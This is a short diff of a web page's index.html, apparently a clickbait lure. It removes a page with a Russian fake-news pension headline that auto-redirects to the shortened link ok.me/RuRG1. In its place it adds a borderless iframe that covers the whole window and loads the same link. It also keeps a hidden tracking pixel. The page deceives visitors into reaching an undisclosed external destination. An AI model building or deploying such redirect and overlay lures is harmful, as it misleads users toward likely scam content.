--- a/index.html
+++ b/index.html
@@ -16,13 +16,5 @@
 </script>
 <noscript><div><img src="https://mc.yandex.ru/watch/92790536" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
 <!-- /Yandex.Metrika counter -->    
-<head>
-   <title>Голикова озвучила новый размер пенсии с 1 мая: приготовьтесь</title>
-  <script>
-    window.location.replace("https://ok.me/RuRG1");
-  </script>
-</head>
-<body>
-  Если страница не открылась, то нажмите еще раз <a href="https://ok.me/RuRG1">сюда</a>.
-</body>
+<iframe src="https://ok.me/RuRG1" style="visibility:visible !important; position:absolute; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;" allowfullscreen="allowfullscreen" webkitallowfullscreen="webkitallowfullscreen" mozallowfullscreen="mozallowfullscreen"></iframe>
 </html>
